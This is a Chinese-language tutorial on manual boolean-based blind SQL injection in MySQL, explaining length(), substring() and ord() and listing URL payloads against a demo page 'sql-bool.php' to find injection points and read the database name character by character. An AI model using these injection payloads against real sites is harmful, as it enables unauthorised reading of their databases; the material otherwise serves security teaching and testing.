mysql盲注_Mysql 布尔型盲注手工注入详解
0x00 什么叫布爾型盲注
布爾型
布爾(Boolean)型是計(jì)算機(jī)里的一種數(shù)據(jù)類型,只有True(真)和False(假)兩個(gè)值。一般也稱為邏輯型。
盲注
在注入時(shí)頁(yè)面無(wú)具體數(shù)據(jù)返回的注入稱之為盲注,一般是通過(guò)其他表現(xiàn)形式來(lái)判斷數(shù)據(jù)的具體內(nèi)容
布爾型盲注
頁(yè)面在執(zhí)行sql語(yǔ)句后,只會(huì)顯示兩種結(jié)果,這時(shí)可通過(guò)構(gòu)造邏輯表達(dá)式的sql語(yǔ)句來(lái)判斷數(shù)據(jù)的具體內(nèi)容。
是不是聽(tīng)的云里霧里的,沒(méi)關(guān)系,繼續(xù)看
0x01 Mysql語(yǔ)法介紹
邏輯運(yùn)算
length()
函數(shù)可返回字符串的長(zhǎng)度
select length(database());
database()函數(shù)不用說(shuō)了,會(huì)返回當(dāng)前數(shù)據(jù)庫(kù)名稱,length()函數(shù)可返回一個(gè)字符串的長(zhǎng)度,這里帶入的是database(),也就是實(shí)際返回的是test的長(zhǎng)度
length
substring()
substring()函數(shù)可以截取字符串,可指定開(kāi)始的位置和截取的長(zhǎng)度
select substring('test',1,3);
select substring('test',2,1);
substring
ord()
ord()函數(shù)可以返回單個(gè)字符的ASCII碼
select substring(database(),1,1);
select ord(substring(database(),1,1));
ord
反之,char()函數(shù)可將ASCII碼轉(zhuǎn)換為對(duì)應(yīng)的字符
select char(116);
char
0x02 手工注入
判斷注入點(diǎn)
這里就不能像聯(lián)合查詢注入一樣根據(jù)頁(yè)面是否報(bào)錯(cuò)判斷了,因?yàn)閟ql執(zhí)行失敗和未查到數(shù)據(jù)都會(huì)返回False,所以只能通過(guò)返回的邏輯值來(lái)判斷
/* 整型注入 */
sql-bool.php?name=user1 and 1=1
sql-bool.php?name=user1 and 1=2
/* 字符型注入 */
sql-bool.php?name=user1' and '1'='1
sql-bool.php?name=user1' and '1'='2
/* 字符型注入 */
sql-bool.php?name=user1" and "1"="1
sql-bool.php?name=user1" and "1"="2
根據(jù)payload返回的成功或失敗可以判斷是否存在注入點(diǎn),
拿整型注入舉個(gè)例子
如果帶入user1返回為存在(真),那么當(dāng)存在整型注入時(shí),通過(guò)邏輯運(yùn)算and(與)的關(guān)系,后面跟上1=1(恒真),那么返回值也肯定為存在(真),帶入1=2(恒假)時(shí),那么返回值也肯定為不存在(假)
通過(guò)這種方式就可以判斷是否存在布爾型盲注
user1
and 1=1
and 1=2
讀數(shù)據(jù)
由于盲注無(wú)法回顯,所以只能通過(guò)將獲取到的數(shù)據(jù)挨個(gè)字符截取,然后再通過(guò)轉(zhuǎn)換為ASCII碼的方式與可見(jiàn)字符的ASCII值一一對(duì)比
這里以讀取當(dāng)前數(shù)據(jù)庫(kù)名為例
/* 判斷庫(kù)名長(zhǎng)度 */
sql-bool.php?name=user1' and (select length(database())) = 1 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 2 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 3 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 4 and '1'='1
假
假
假
真
當(dāng)length(database())=4時(shí),返回真,也就是數(shù)據(jù)庫(kù)名的長(zhǎng)度有4位
然后我們?cè)僖晃灰晃坏呐袛嘧址麅?nèi)容,由于mysql庫(kù)名不區(qū)分大小寫,且組成元素為26位英文字母、數(shù)字和下劃線,所以只需要和這些字符的ASCII值進(jìn)行比較
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 97 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 98 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 99 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 100 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 101 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 102 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 103 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 104 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 105 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 106 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 107 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 108 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 109 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 110 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 111 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 112 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 113 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 114 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 115 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 116 and '1'='1
假
真
當(dāng)與其他ASCII值判斷時(shí),返回均為假,與116判斷是否相等時(shí),返回為真,由此可判斷數(shù)據(jù)庫(kù)名第一個(gè)字符的ASCII值為116,再通過(guò)ASCII轉(zhuǎn)換為字符,可得知當(dāng)前數(shù)據(jù)庫(kù)名第一個(gè)字符內(nèi)容為't'
char
其他數(shù)據(jù)同樣是用相同的辦法讀取內(nèi)容
總結(jié)
以上是生活随笔為你收集整理的mysql盲注_Mysql 布尔型盲注手工注入详解的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 用shell打印正三角形_用shell命
- 下一篇: MySQL:规范数据库设计